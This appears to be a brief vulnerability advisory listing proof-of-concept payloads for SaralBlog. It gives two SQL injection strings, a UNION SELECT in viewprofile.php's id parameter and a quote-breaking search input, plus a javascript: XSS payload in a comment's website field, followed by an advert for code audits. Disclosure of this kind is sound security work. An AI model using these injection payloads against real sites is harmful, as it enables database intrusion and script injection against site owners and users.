PoC/Exploit for XSS and Multiple SQL Injection in SaralBlog

Published Proof of Concept code - XSS and Multiple SQL Injection in SaralBlog.

Description
Available
Solution
Not available - check vendor's website

1. SQL Injection Example
http://host/viewprofile.php?id=999%20union%20select%201,2,3,4,5,6,7/*


2. SQL Injection Example (gpc_magic_quotes: off)

Search:
aaaaa') union select 1,2,3,4,5,6/*


3. Cross-Site Scripting

Adding new comment:
Website: javascript:alert(123)

Order Source Code Analysis

You may order source code analysis of your site made by Aliaksandr Hartsuyeu.The work will be done by experts in web security.

Advisories by vuln type